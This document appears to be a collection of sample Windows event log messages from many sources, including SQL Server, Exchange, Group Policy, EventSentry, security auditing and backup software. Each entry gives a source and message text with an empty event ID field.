Error Text:
File: 9
Line: ae0
Error Data is in record data.



Event ID:
Source:
DCOM
Message:
DCOM got error '58' attempting to start the service gusvc with arguments '' in order to run the server:89DAE4CD-9F17-4980-902A-99BA84A8F5C8


Event ID:
Source:
MsiInstaller
Message:
Product: QuickBooks -- Error 1328.Error applying patch to file C:\Config.Msi\PT43.tmp. It has probably been updated by other means, and can no longer be modified by this patch. For more information contact your patch vendor. System Error: -1072807676


Event ID:
Source:
ipnathlp
Message:
The Network Address Translator (NAT) was unable to request an operation of the kernel-mode translation module. This may indicate misconfiguration, insufficient resources, or an internal error. The data is the error code.


Event ID:
Source:
TermServDevices
Message:
Error communicating with the Spooler system service. Open the Services snap-in and confirm that the Print Spooler service is running.


Event ID:
Source:
Win32k
Message:
A desktop heap allocation failed.


Event ID:
Source:
RemoteAccess
Message:
The user DOMAIN\User connected to port VPN4-5 has been disconnected because no network protocols were successfully negotiated.


Event ID:
Source:
Server Administrator
Message:
Predictive Failure reported: Array Disk 0:4 Controller 0, Connector 0


Event ID:
Source:
System event log
Category:
Warning
Message:
Your computer was not able to renew its address from the network (from the DHCP Server) for the Network Card with network address 00508DB42684. The following error occurred:
The semaphore timeout period has expired.. Your computer will continue to try and obtain an address on its own from the network address (DHCP) server.


Event ID:
Source:
Unlocker application
Message:
\Device\UnlockerDriver5/

0000: 00 00 00 00 01 00 68 00 00 00 00 00 36 00 04 80
0001: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0002: 00 00 00 00 00 00 00 00


Event ID:
Source:
EventSentry
Message:
The following 2 service(s) are configured to AUTOSTART but are currently not running:
Performance Logs and Alerts
Virtual Machine Additions Shared Folder Service


Event ID:
Source:
AutoEnrollment
Message:
Automatic certificate enrollment for local system failed to enroll for one Domain Controller certificate (0x80070005). Access is denied.


Event ID:
Source:
Eventlog
Message:
Microsoft (R) Windows (R) 5.02. 3790 Service Pack 2 Multiprocessor Free.


Event ID:
Source:
MSSQLSERVER
Message:
Login failed for user 'sa'. [CLIENT: 192.168.6.52]



Event ID:
Source:
Tcpip
Message:
The system detected an address conflict for IP address 172.20.5.14 with the system having network hardware address 00:07:E9:40:7C:40. Network operations on this system may be disrupted as a result.


Event ID:
Source:
Windows Update Agent
Message:
Installationsfehler: Die Installation des folgenden Updates ist mit Fehler 0x80070643 fehlgeschlagen: Sicherheitsupdate für Microsoft .NET Framework, Version 1.1 Service Pack 1 (KB928366)



Event ID:
Source:
Windows Update Agent
Message:
Installationsfehler: Die Installation des folgenden Updates ist mit Fehler 0x80070643 fehlgeschlagen: Sicherheitsupdate für Microsoft .NET Framework, Version 1.1 Service Pack 1 (KB928366)
Installation Error: the installation of the following update has failed with error 0x80070643: Security Update for Microsoft .NET Framework Version 1.1 Service Pack 1 (KB928366)


Event ID:
Source:
Perflib
Message:
Windows cannot load extensible counter DLL MSSQL$MS_ADMT, the first DWORD in data section is the Windows error code.



Event ID:
Source:
Microsoft-Windows-ApplicationExperienceInfrastructure
Message:
The application (OfficeScan Client, from vendor Trend Micro, INC.) has the following problem: OfficeScan Client is incompatible with this version of Windows. For more information, contact Trend Micro, INC..


Event ID:
Source:
MSSQL$SQLEXPRESS
Message:
SQL Server has encountered 136 occurrence(s) of cachestore flush for the 'Object Plans' cachestore (part of plan cache) due to some database maintenance or reconfigure operations.



Event ID:
Source:
SQLVDI
Message:
SQLVDI: Loc=CVDS::Cleanup. Desc=Release(ClientAliveMutex). ErrorCode=(288)Attempt to release mutex not owned by caller.
. Process=2084. Thread=5976. Client. Instance=. VD=.


Event ID:
Source:
EventSentry
Message:
The following service was removed: CryptSvc4951 (CryptSvc4951). Last service state was Stopped.



Event ID:
Source:
.NET Runtime 2.0 Error Reporting
Message:
EventType clr20r3, P1 w3wp.exe, P2 6.0.3790.3959, P3 45d6968e, P4 mscorlib, P5 2.0.0.0, P6 471ebc5b, P7 416e, P8 a3, P9 system.argumentoutofrange, P10 NIL.



Event ID:
Source:
ASP.NET 2.0.50727.0
Message:
An unhandled exception occurred and the process was terminated.

Application ID: /LM/W3SVC/1694288962/ROOT/ReportingWebService

Process ID: 5568

Exception: System.ArgumentOutOfRangeException

Message: Index was out of range. Must be non-negative and less than the size of the collection.
Parameter name: index

StackTrace:
Server stack trace:
at System.Collections.ArrayList.get_Item(Int32 index)
at System.Collections.Specialized.StringCollection.get_Item(Int32 index)
at Microsoft.UpdateServices.Internal.Reporting.ExtendedData.ToString()
at Microsoft.UpdateServices.Internal.Reporting.ReportingEvent.ToString()
at Microsoft.UpdateServices.Internal.Reporting.DebugEventHandler.HandleEvent(IReportingInformation[] itemList)
at System.Runtime.Remoting.Messaging.StackBuilderSink._PrivateProcessMessage(IntPtr md, Object[] args, Object server, Int32 methodPtr, Boolean fExecuteInContext, Object[]


Event ID:
Source:
EventSentry
Category:
Heartbeat Monitoring
Message:
The AGENT status of host <HOSTNAME> (<GROUP>) remains at ERROR due to error "Access is denied.
".


Event ID:
Source:
TermServDevices
Message:
Driver HP Color LaserJet 4600 PCL 6 required for printer !!swpma1fs1!MA1-POINT-COLOR-HP4600 is unknown. Contact the administrator to install the driver before you log in again.


Event ID:
Source:
Security
Category:
Object Access
Message:
Object Access Attempt:
Object Server: Security
Handle ID: 9780
Object Type: File
Process ID: 904
Image File Name: C:\WINDOWS\system32\svchost.exe
Accesses: WriteData (or AddFile)
AppendData (or AddSubdirectory or CreatePipeInstance)

Access Mask: 0x6


Event ID:
Source:
Application Error
Message:
Faulting application eventsentry_svc.exe, version 2.60.0.130, faulting module eventsentry_svc.exe, version 2.60.0.130, fault address 0x0002eafa.



Event ID:
Source:
EventSentry
Category:
Software Monitoring
Message:
Application 86C01576-F161-3624-9462-D87DE3243DC4 (using file ) was removed from the registry key HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components and will no longer be run when a user logs into the system.



Event ID:
Source:
.NET Runtime Optimization Service
Message:
.NET Runtime Optimization Service (clr_optimization_v2.0.50727_32) - Failed to compile: Microsoft.ReportingServices.QueryDesigners, Version=9.0.242.0, Culture=neutral, PublicKeyToken=89845dcd8080cc91 . Error code = 0x80070002


Event ID:
Source:
Srv
Message:
The server was unable to allocate from the system paged pool because the pool was empty.


Event ID:
Source:
ESE
Category:
Logging/Recovery
Message:
Information Store (284) First Storage Group: Attempted to attach database 'D:\Program Files\Exchsrvr\MDBDATA\priv1.EDB' but it is a database restored from a backup set on which hard recovery was not started or did not complete successfully.


Event ID:
Source:
MSExchangeIS
Category:
General
Message:
Error 0xfffffde0 starting database "First Storage Group\Mailbox Store (SERVER)" on the Microsoft Exchange Information Store.


Event ID:
Source:
MSExchangeSA
Category:
MAPI Session
Message:
The MAPI call 'OpenMsgStore' failed with the following error:
The attempt to log on to the Microsoft Exchange Server computer has failed.
The MAPI provider failed.
Microsoft Exchange Server Information Store
ID no: 8004011d-0512-00000000


Event ID:
Source:
Microsoft-Windows-Perflib
Message:
The data buffer created for the "VMware" service in the "C:\Program Files\VMware\VMware Server\vmPerfmon.dll" library is not aligned on an 8-byte boundary. This may cause problems for applications that are trying to read the performance data buffer. Contact the manufacturer of this library or service to have this problem corrected or to get a newer version of this library.


Event ID:
Source:
Perflib
Message:
The configuration information of the performance library "C:\WINDOWS\system32\aspperf.dll | infoctrs.dll | perfts.dll" for the "ASP | InetInfo | TermService" service does not match the trusted performance library information stored in the registry. The functions in this library will not be treated as trusted.


Event ID:
Source:
Security
Category:
Detailed Tracking
Message:
Unprotection of auditable protected data.
Data Description:
Key Identifier: 575dfb1a-2f3a-4cdd-a08c-5e2bf47579ed
Protected Data Flags: 0x0
Protection Algorithms: 3DES-168 , SHA1-160
Failure Reason: 0x8009000B


Event ID:
Source:
MSExchangeIS Public Store
Category:
Access Control
Message:
user@domain.com failed an operation on folder /O=ORG/OU=FIRST ADMINISTRATIVE GROUP/CN=RECIPIENTS/CN=OAB VERSION 3AD24215E446FED006D7E903A387A01BE4002721 on database "First Storage Group\Public Folder Store (SERVER)" because the user did not have the following access rights:
'Delete' 'Read Property' 'Write Property' 'Create Message' 'View Item' 'Create Subfolder' 'Write Security Descriptor' 'Write Owner' 'Read Security Descriptor' 'Contact'
The entry ID of the folder is in the data section of this event.



Event ID:
Source:
ati2mtag
Message:
I2c return failed


Event ID:
Source:
Microsoft-Windows-Kerberos-Key-Distribution-Center
Message:
The Key Distribution Center (KDC) cannot find a suitable certificate to use for smart card logons, or the KDC certificate could not be verified. Smart card logon may not function correctly if this problem is not resolved. To correct this problem, either verify the existing KDC certificate using certutil.exe or enroll for a new KDC certificate.


Event ID:
Source:
nv
Message:
Unknown error on L1 -> L0



Event ID:
Source:
DNS
Message:
The DNS server has encountered numerous run-time events. To determine the initial cause of these run-time events, examine the DNS server event log entries that precede this event. To prevent the DNS server from filling the event log too quickly, subsequent events with Event IDs higher than 3000 will be suppressed until events are no longer being generated at a high rate.


Event ID:
Source:
EventSentry
Category:
Software Monitoring
Message:
Application 3087B10A-0736-6446-6DF0-F69FB0A3D2DA (using file ) was removed from the registry key HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components and will no longer be run when a user logs into the system.


Event ID:
Source:
Windows Update Agent
Category:
Installation
Message:
Installation Failure: Windows failed to install the following update with error 0x80070643: Update for .NET Framework 3.0: x86 (KB932471).


Event ID:
Source:
Disk
Message:
An error was detected on device \Device\Harddisk3\D during a paging operation.



Event ID:
Source:
NTDS Replication
Message:
The Windows NT 4.0 or earlier replication checkpoint with the PDC emulator master was unsuccessful.

A full synchronization of the security accounts manager (SAM) database to domain controllers running Windows NT 4.0 and earlier might take place if the PDC emulator master role is transferred to the local domain controller before the next successful checkpoint.

The checkpoint process will be tried again in four hours.

Additional Data
Error value:
1722 The RPC server is unavailable.



Event ID:
Source:
Microsoft-Windows-GroupPolicy
Message:
The processing of Group Policy failed. Windows attempted to read the file \\mydomain.local\SysVol\mydomain.local\Policies\D3610029-D721-41DA-ACE6-FD0CAF521432\gpt.ini from a domain controller and was not successful. Group Policy settings may not be applied until this event is resolved. This issue may be transient and could be caused by one or more of the following:
a) Name Resolution/Network Connectivity to the current domain controller.
b) File Replication Service Latency (a file created on another domain controller has not replicated to the current domain controller).
c) The Distributed File System (DFS) client has been disabled.


Event ID:
Source:
Office SharePoint Server
Category:
Office Server Shared Services
Message:
490684
Application
Warning
Office SharePoint Server
Office Server Shared Services
6801
REPORT
5/28/2008 12:00:01 AM
The OSS SQM Data Collection Job encountered a problem.

Reason: The site with the id 6543302f-5713-47ba-ac93-ba38dd1d9cd6 could not be found.

Technical Support Details:
System.IO.FileNotFoundException: The site with the id 6543302f-5713-47ba-ac93-ba38dd1d9cd6 could not be found.
at Microsoft.SharePoint.SPSite..ctor(Guid id, SPFarm farm, SPUrlZone zone, SPUserToken userToken)
at Microsoft.SharePoint.SPSite..ctor(Guid id, SPFarm farm, SPUrlZone zone)
at Microsoft.SharePoint.SPSite.LookupUriInRemoteFarm(SPFarm farm, Guid id, SPUrlZone zone)
at Microsoft.Office.Server.Administration.SharedResourceProvider.GetAdministrationSiteUrl(SPUrlZone zone)
at Microsoft.Office.Server.ServerContext.GetAdministrationSiteUrl(SPUrlZone zone)
at Microsoft.Office.Server.Audience.AudienceSiteInfo..ctor(ServerContext serverContext, Boolean bCentral, Boolean bPublic, AudienceAccessRights AccessRights)
at Microsoft.Office.Server.Audience.AudienceManager.get_Audiences()
at Microsoft.Office.Server.Diagnostics.StaticSqmDataCollectionJob.RecordAudienceApplicationSspData(SharedResourceProvider ssp)
at Microsoft.Office.Server.Diagnostics.StaticSqmDataCollectionJob.RecordSspData(SharedResourceProvider ssp)



Event ID:
Source:
EventSentry
Message:
Free disk space for drive T:\ (ISBORA8_T) is below the configured limit of 2 percent. 2.00 percent of disk space (10239 Mb) are currently available on drive T:\.


Event ID:
Source:
MsiInstaller
Message:
Product: Microsoft Visual Studio 2005 Professional Edition - ENU -- Error 1718.File C:\WINDOWS\Installer\a4cb8.msp did not pass the digital signature check. For more information about a possible resolution for this problem, see http://go.microsoft.com/fwlink/?LinkId=73863.


Event ID:
Source:
w32time
Message:
The NTP server (null) isn't sync'd, time not set



Event ID:
Source:
Service Control Manager
Message:
The APC UPS Service service is marked as an interactive service. However, the system is configured to not allow interactive services. This service may not function properly.


Event ID:
Source:
Microsoft-Windows-WMI
Message:
Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.



Event ID:
Source:
Security
Category:
Account Management
Message:
User Account Unlocked:
Target Account Name: gwashington
Target Domain: USA
Target Account ID: USA\gwashington
Caller User Name: sys.admin
Caller Domain: USA
Caller Logon ID: (0x0,0x41708D37)


Event ID:
Source:
Microsoft-Windows-Security-Auditing
Category:
Other System Events
Message:
Windows Firewall was unable to notify the user that it blocked an application from accepting incoming connections on the network.

Error Code: 2


Event ID:
Source:
Userenv
Message:
Windows cannot query for the list of Group Policy objects. Check the event log for possible messages previously logged by the policy engine that describes the reason for this.


Event ID:
Source:
Security
Category:
Logon/Logoff
Message:
Logon Failure:
Reason: Unknown user name or bad password
User Name: My Name
Domain: MYDOMAIN
Logon Type: 3
Logon Process: NtLmSsp
Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Workstation Name: WORKSTATION


Event ID:
Source:
EventSentry
Message:
Free disk space for drive C:\ () is back above the configured limit of 500 Mb. 2389 Mb of disk space are currently available on drive C:\.


Event ID:
Source:
Microsoft Office 12
Message:
EventType office11shipassert, P1 1be6, P2 12.0.6215.0, P3 NIL, P4 NIL, P5 NIL, P6 NIL, P7 NIL, P8 NIL, P9 NIL, P10 NIL.



Event ID:
Source:
Windows SharePoint Services 3
Category:
Timer
Message:
The Execute method of job definition Microsoft.Office.Server.Administration.ApplicationServerAdministrationServiceJob (ID 693fe0b2-6c9f-47bf-9d1a-c6a2aa7cd3c3) threw an exception. More information is included below.

Attempted to read or write protected memory. This is often an indication that other memory is corrupt.



Event ID:
Source:
NtServicePack
Message:
Windows XP Service Pack 3 installation failed.
Access is denied.


Event ID:
Source:
POP3SVC
Category:
Content Engine
Message:
Error 0x7d6 occurred while rendering message 0008-0000008949b3 for download for user user@emaildomain.com.


Event ID:
Source:
Security
Category:
Detailed Tracking
Message:
The Windows Firewall has detected an application listening for incoming traffic.

Name: -
Path: C:\WINDOWS\system32\someprocess.exe
Process identifier: 3732
User account: SYSTEM
User domain: NT AUTHORITY
Service: Yes
RPC server: No
IP version: IPv4
IP protocol: UDP
Port number: 55751
Allowed: No
User notified: No


Event ID:
Source:
ActiveDocs Enterprise - Web Wizard
Message:
Error occured InitializeDeliveryServices services.Thread was being aborted. at DocumentDelivery.CheckQueues.CheckQueues() at DocumentDelivery.DeliveryServicesMonitor.RefreshDeliveryServices() at DocumentDelivery.DeliveryServicesMonitor.InitializeDeliveryServices() -


Event ID:
Source:
ActiveDocs Enterprise - Web Wizard
Message:
An error occured in the ActiveDocs Enterprise Service while checking queues for the database 'activedocs' on Server 'PROV109\ACTIVEDOCS' [D:\Applications\ActiveDocs\DocGenerator\activedocs.config]. Thread was being aborted. at WWTManager.WWTManager.CheckConversionAndDeliveryTimeOuts() at DocumentDelivery.CheckQueues.CheckQueues() - PROV109\ACTIVEDOCS - activedocs


Event ID:
Source:
EvntAgnt
Message:
SNMP Event Log Extension Agent did not initialize correctly.


Event ID:
Source:
EvntAgnt
Message:
Error processing registry parameters. Extension agent terminating.


Event ID:
Source:
EvntAgnt
Message:
Error positioning to end of log file -- seek to end of log failed. Handle specified is 635992. Return code from ReadEventLog is 1500.


Event ID:
Source:
EvntAgnt
Message:
SNMP Event Log Extension Agent did not initialize correctly.


Event ID:
Source:
EventSentry
Message:
Host ACLXIDS (Servers) changed its PING status from ERROR to OK. The reason for the status change was: 'Ping Successful (Rate:100%, Avg:0ms, Max:0ms, Min:0ms)'.


Event ID:
Source:
TermServDevices
Message:
Error communicating with the Spooler system service. Open the Services snap-in and confirm that the Print Spooler service is running.



Event ID:
Source:
MRxSmb
Message:
The redirector failed to determine the connection type.


Event ID:
Source:
Ntfs
Category:
2
Message:
The file system structure on the disk is corrupt and unusable. Please run the chkdsk utility on the volume NAME_OF_VOLUME.


Event ID:
Source:
MSSQL$ACTIVEDOCS
Message:
3041 :BACKUP failed to complete the command BACKUP DATABASE [activedocs] TO DISK = N'd:\microsoft\mssqldata\MSSQL$ACTIVEDOCS\BACKUP\activedocs\activedocs_db_200809021915.BAK' WITH INIT , NOUNLOAD , NOSKIP , STATS = 10, NOFORMAT


Event ID:
Source:
MSSQL$ACTIVEDOCS
Message:
18210 :BackupMedium::ReportIoError: write failure on backup device 'd:\microsoft\mssqldata\MSSQL$ACTIVEDOCS\BACKUP\activedocs\activedocs_db_200809021915.BAK'. Operating system error 112(There is not enough space on the disk.).


Event ID:
Source:
snort
Message:
[1:1201:7] ATTACK-RESPONSES 403 Forbidden [Classification: Attempted Information Leak] [Priority: 2]: {TCP} 192.168.20.20:80 -> 216.86.148.242:48121


Event ID:
Source:
Security
Category:
Account Logon
Message:
Logon attempt by: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Logon account: johndoe
Source Workstation:
Error Code: 0xC0000071



Event ID:
Source:
SQLISPackage
Message:
Package 'transbackup' failed.


Event ID:
Source:
Security
Message:
The audit log was cleared Primary User Name: SYSTEM Primary Domain: NT AUTHORITY Primary Logon ID: (0x0,0x3E7) Client User Name: nsi Client Domain: NSISENTRYTBOH Client Logon ID: (0x0,0x2568E)


Event ID:
Source:
Microsoft-Windows-GroupPolicy
Message:
The Group Policy Client Side Extension Software Installation was unable to apply one or more settings because the changes must be processed before system startup or user logon. The system will wait for Group Policy processing to finish completely before the next startup or logon for this user, and this may result in slow startup and boot performance.


Event ID:
Source:
Application Management Group Policy
Message:
The removal of the assignment of application MySQL Connector/ODBC 5.1 from policy Software Installation failed. The error was : The system cannot find the file specified.


Event ID:
Source:
Application Management Group Policy
Message:
Failed to apply changes to software installation settings. The installation of software deployed through Group Policy for this user has been delayed until the next logon because the changes must be applied before the user logon. The error was : The group policy framework should call the extension in the synchronous foreground policy refresh.


Event ID:
Source:
Server ActiveSync
Message:
IP-based AUTD failed to initialize because the processing of notifications could not be setup. Error code [0x80004005]. Verify that no other applications are currently bound to UDP port [2883], or try specifying a different port number.


Event ID:
Source:
Server ActiveSync
Message:
IP-based AUTD failed to initialize. Error code: [0x80004005].


Event ID:
Source:
Backup Exec
Message:
Backup Exec Alert: Job Cancellation
(Server: "servername") (Job: "Daily") The job was canceled because the response to a media request alert was Cancel, or because the alert was configured to automatically respond with Cancel, or because the Backup Exec Job Engine service was stopped.

For more information, click the following link:
http://eventlookup.veritas.com/eventlookup/EventLookup.jhtml



Event ID:
Source:
Ci
Category:
CI Service
Message:
Cleaning up corrupt content index metadata on d:\system volume information\catalog.wci. Index will be automatically restored by refiltering all documents.


Event ID:
Source:
Security
Message:
Logon Failure: Reason: Unknown user name or bad password User Name: lgreenle Domain: mlsnet.local Logon Type: 7 Logon Process: User32 Authentication Package: Negotiate Workstation Name: MLS-APPS Caller User Name: MLS-APPS$ Caller Domain: MLSNET Caller Logon ID: (0x0,0x3E7) Caller Process ID: 9204 Transited Services: - Source Network Address: 192.168.0.76 Source Port: 39647


Event ID:
Source:
Security
Message:
Logon Failure: Reason: Unknown user name or bad password User Name: lward Domain: Logon Type: 10 Logon Process: User32 Authentication Package: Negotiate Workstation Name: MLS-APPS Caller User Name: MLS-APPS$ Caller Domain: MLSNET Caller Logon ID: (0x0,0x3E7) Caller Process ID: 15676 Transited Services: - Source Network Address: 192.168.0.85 Source Port: 2235


Event ID:
Source:
NtFrs
Message:
Der Dateireplikationsdienst liest die Daten in den Systemdatenträger ein. Der Computer "SRV2" kann nicht zum Domänencontroller benannt werden, bis dieser Vorgang beendet ist. Das Systemvolumen wird dann unter SYSVOL freigegeben.

Um die SYSVOL-Freigabe zu überprüfen, geben Sie an der Eingabeaufforderung folgendes ein:
net share

Wenn der Dateireplikationsdienst den Scanvorgang beendet, erscheint die SYSVOL-Freigabe.

Die Initialisierung des Systemdatenträgers kann einige Zeit in Anspruch nehmen. Der Zeitaufwand ist von der Datenmenge im Systemdatenträger abhängig.



Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
The performance counter "PhysicalDisk(*)\Avg. Disk Queue Length" could not be monitored due to error "0xC0000BB8". Please make sure that the performance counter exists. If you are running a non-english version of Windows then performance counters are named in the language of the Operating System.


Event ID:
Source:
volsnap
Message:
The shadow copies of volume C: were aborted because the shadow copy storage could not grow due to a user imposed limit.


Event ID:
Source:
Folder Redirection
Message:
Failed to perform redirection of folder Application Data. The new directories for the redirected folder could not be created. The folder is configured to be redirected to <\\MD61NTFS100\Home\%USERNAME%\Application Data>, the final expanded path was <\\MD61NTFS100\Home\E385776\Application Data>. The following error occurred: The system cannot find the path specified.


Event ID:
Source:
SideBySide
Message:
Activation context generation failed for "C:\someapp.exe". Dependent Assembly Microsoft.VC80.DebugCRT,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762" could not be found. Please use sxstrace.exe for detailed diagnosis


Event ID:
Source:
EventSentry
Message:
The Windows PowerShell event log could not be cleared and backed up to file \\FS1\DEPARTMENTS\TECHNOLOGY\PRIVATE\EVENTLOGBACKUPS\VMUTIL WINDOWS POWERSHELL 04 11 2008 12 07.EVT due to the following error:

Access is denied.
.



Event ID:
Source:
MySQL
Message:
Aborted connection 231292 to db: 'mydatabase' user: 'dbuser' host: '192.168.1.123' (Got an error reading communication packets)



Event ID:
Source:
EventSentry
Message:
Action "Desktop" was unable to create a mailslot for host "." due to error: The system cannot find the file specified.


Event ID:
Source:
VWServicesPA
Message:
Source: Process AnalyzerCube Processing Status: DTSRun: Loading...DTSRun: Executing...DTSRun OnStart: DTSStep_DTSOlapProcess.Task_1DTSRun OnError: DTSStep_DTSOlapProcess.Task_1, Error = -2147221384 (80040078) Error string: More than the maximum of 64,000 dimension member children for a single parent (dimension 'Zaaknummer', level 'Zaaknummer', member '141715'). Error source: Zaaknummer Help file: Help context: 1000440Error Detail Records:Error: 0 (0)


Event ID:
Source:
Windows SharePoint Services 3
Message:
The Execute method of job definition Microsoft.Office.Server.Administration.ApplicationServerAdministrationServiceJob (ID a778c03a-b4d5-47ad-b0d5-6130b9c8ba14) threw an exception. More information is included below.

Attempted to read or write protected memory. This is often an indication that other memory is corrupt.



Event ID:
Source:
MSExchangeIS
Message:
Mapi session '/O=Stercomm/OU=Amsterdam/cn=Recipients/cn=OBlanc' exceeded the maximum of 500 objects of type 'objtFolder'. For more information, click http://www.microsoft.com/contentredirect.asp.


Event ID:
Source:
atikmdag
Category:
CRT
Message:
CRT invalid display type


Event ID:
Source:
KDC
Message:
There are multiple accounts with name MSSQLSvc/venus.partnershipassurance.int:3038 of type DS_SERVICE_PRINCIPAL_NAME.


Event ID:
Source:
MSExchangeTransport
Message:
A non-delivery report with a status code of 5.3.0 was generated for recipient rfc822


Event ID:
Source:
Application Error
Message:
Faulting application NICA.exe, version 1.1.0.60823, faulting module NICA.exe, version 1.1.0.60823, fault address 0x0002af39.



Event ID:
Source:
EventSentry
Message:
Host SCISTONETBOTZ (EMEA Netbotz) changed its PING status from OK to ERROR. The reason for the status change was: "100% packets lost".



Event ID:
Source:
disk
Message:
The driver disabled the write cache on device \Device\Harddisk0\DR0.


Event ID:
Source:
Tcpip
Message:
TCP/IP has chosen to restrict the scale factor due to a network condition. This could be related to a problem in a network device and will cause degraded throughput.



Event ID:
Source:
Service Control Manager
Category:
None
Message:
Timeout (30000 milliseconds) waiting for the hpqwmiex service to connect.


Event ID:
Source:
Backup Exec
Category:
1
Message:
Adamm Mover Error: Unload Rewind Failure!
Error = ERROR_IO_DEVICE
Drive = "HP 2"
2E6FDCE6-51A8-4918-B499-9233C643E041
Media = ""
00000000-0000-0000-0000-000000000000
Read Mode: SingleBlock(0), ScsiPass(0)
Write Mode: SingleBlock(1), ScsiPass(1)



Event ID:
Source:
MS ExchangeIS Mailbox
Category:
Rules
Message:
Error 1245 while disabling rule on public folder with rule ID <rule id number>. The folder ID of the public folder is in the data section of this event.


Event ID:
Source:
ClusSvc
Category:
Failover Mgr
Message:
Cluster resource <resource> in Resource Group <group> failed.


Event ID:
Source:
Windows Server Update
Category:
Clients
Message:
Self-update is not working


Event ID:
Source:
Share Point Portal Administration
Category:
None
Message:
An exception occured in the search synchronizer.


Event ID:
Source:
Microsoft-Windows-WPD-MTPClassDriver
Category:
Driver Initilization.
Message:
MTP WPD Driver has failed to start. Error 0x8007001f.


Event ID:
Source:
NETLOGON
Message:
The Netlogon service could not read a mailslot message from The system cannot find the path specified. due to the following error:
03000000


Event ID:
Source:
.NET Runtime 2.0 Error Reporting
Category:
None
Message:
EventType clr20r3, P1 toad.exe, P2 0.0.0.0, P3 46deb19e, P4 mscorlib, P5 2.0.0.0, P6 471ebc5b, P7 f46, P8 0, P9 n3ctrye2kn3c34sgl4zqyrbfte4m13nb, P10 NIL.



Event ID:
Source:
Sharepoint server 2007
Category:
Publishing Cache
Message:
Unable to connect publishing custom string handler for output caching. IIS Instance Id is '762598284', Url is 'http://spoint2007/....html'.


Event ID:
Source:
NetBT
Category:
Error
Message:
The name "DomainName :1d" could not be registered on the Interface with IP address w.x.y.z. The machine with the IP address w.x.y.a did not allow the name to be claimed by this machine.



Event ID:
Source:
EventSentry
Category:
None
Message:
Action "MSSQL Database", invoked by feature, "Performance Monitoring" was unable to connect to the database due to error "[HYT00] [Microsoft][ODBC SQL Server Driver]Timeout expired (0)". EventSentry will queue events and continue to attempt the delivery of events.


Event ID:
Source:
Wins
Message:
EVENT # 2521
EVENT LOG System
EVENT TYPE Error
SOURCE Wins
EVENT ID 4204
COMPUTERNAME FDS-NT5
DATE / TIME 2/12/2009 8:56:27 AM
MESSAGE WINS could not read from the User Datagram Protocol (UDP) socket.
BINARY DATA 0000: 01 15 00 00 46 27 00 00



Event ID:
Source:
Security
Message:
Category Logon/Logoff
Type: success A
NT AUTHORITY\ANONYMOUS LOGON
Successful Network Logon:
User Name:
Domain:
Logon ID: (0x0,0x265B7)
Logon Type: 3
Logon Process: NtLmSsp
Authentication Package: NTLM
Workstation Name:
Logon GUID: -


Event ID:
Source:
LSASRV
Category:
SPNEGO (Negotiator)
Message:
The Security System detected an authentication error for the server cifs/SERVER.domain.local. The failure code from authentication protocol Kerberos was "The specified user does not exist.
(0xc0000064)".


Event ID:
Source:
Report Server Windows Service (EVENTSENTRY)
Category:
Startup/Shutdown
Message:
The report server database is an invalid version.


Event ID:
Source:
Application Popup
Message:
An I/O operation initiated by the Registry failed unrecoverably. The Registry could not read in, or write out, or flush, one of the files that contain the system's image of the Registry.


Event ID:
Source:
User Profile Service
Message:
Windows detected your registry file is still in use by other applications or services. The file will be unloaded now. The applications or services that hold your registry file may not function properly afterwards.

DETAIL -
2 user registry handles leaked from \Registry\User\S-1-5-21-3955188477-656860062-1151124159-1021:
Process 6540 (\Device\HarddiskVolume3\Windows\System32\winlogon.exe) has opened key \REGISTRY\USER\S-1-5-21-3955188477-656860062-1151124159-1021
Process 1356 (\Device\HarddiskVolume3\Windows\System32\svchost.exe) has opened key \REGISTRY\USER\S-1-5-21-3955188477-656860062-1151124159-1021\Printers\DevModePerUser



Event ID:
Source:
MSSOAP
Message:
Soap error: Restoring data into SoapMapper GetAuthenticationTicketResult failed.


Event ID:
Source:
MSSOAP
Message:
Soap error: Unspecified client error..


Event ID:
Source:
idsvc
Message:
Service stopped successfully.


Event ID:
Source:
spoolerwin32spl
Message:
The print spooler failed to reopen an existing printer connection because it could not read the configuration information from the registry key S-1-5-18\Printers\Connections. The print spooler could not open the registry key. This can occur if the registry key is corrupt or missing, or if the registry recently became unavailable.


Event ID:
Source:
APCPBEAgent
Message:
"Insufficient Runtime Available"


Event ID:
Source:
cpqasm2
Message:
Memory module #5 has exceeded its threshold of correctable errors. Subsequent correctable memory errors will continue to be corrected.


Event ID:
Source:
APCPBEAgent
Message:
"AVR Trim Active"


Event ID:
Source:
Windows Search Service
Category:
Gatherer
Message:
A document ID cannot be allocated.
Context: Windows Application, SystemIndex Catalog
Details:
The content index server cannot update or access information because of a database error. Stop and restart the search service. If the problem persists, reset and recrawl the content index. In some cases it may be necessary to delete and recreate the content index. (0x8004117f)



Event ID:
Source:
DnsApi
Message:
The system failed to register host (A or AAAA) resource records (RRs) for network adapter
with settings:

Adapter Name : 27E49756-7394-4750-8CDC-8D3EAF944953
Host Name : YOURSERVER
Primary Domain Suffix : yourdomain.local
DNS server list :
192.168.2.10, 192.168.2.11
Sent update to server : 192.168.2.10:53
IP Address(es) :
192.168.2.95

The reason the system could not register these RRs was because of a security related problem. The cause of this could be (a) your computer does not have permissions to register and update the specific DNS domain name set for this adapter, or (b) there might have been a problem negotiating valid credentials with the DNS server during the processing of the update request.

You can manually retry DNS registration of the network adapter and its settings by typing "ipconfig /registerdns" at the command prompt. If problems still persist, contact your DNS server or network systems administrator. For specific error code, see the record data displayed below.


Event ID:
Source:
DhcpServer
Message:
Scope, 192.168.1.0, is 95 percent full with only 1 IP addresses remaining.


Event ID:
Source:
Apache Service
Message:
The Apache service named reported the following error:
>>> httpd.exe: Syntax error on line 116 of C:/Program Files (x86)/CollabNet Subversion Server/httpd/conf/httpd.conf: Cannot load C:/Program Files (x86)/CollabNet Subversion Server/httpd/modules/mod_dav_svn.so into server: The specified module could not be found.


Event ID:
Source:
Microsoft-Windows-Security-Auditing
Category:
Logoff
Message:
An account was logged off.

Subject:
Security ID: TESTGROUND\cacheduser
Account Name: cacheduser
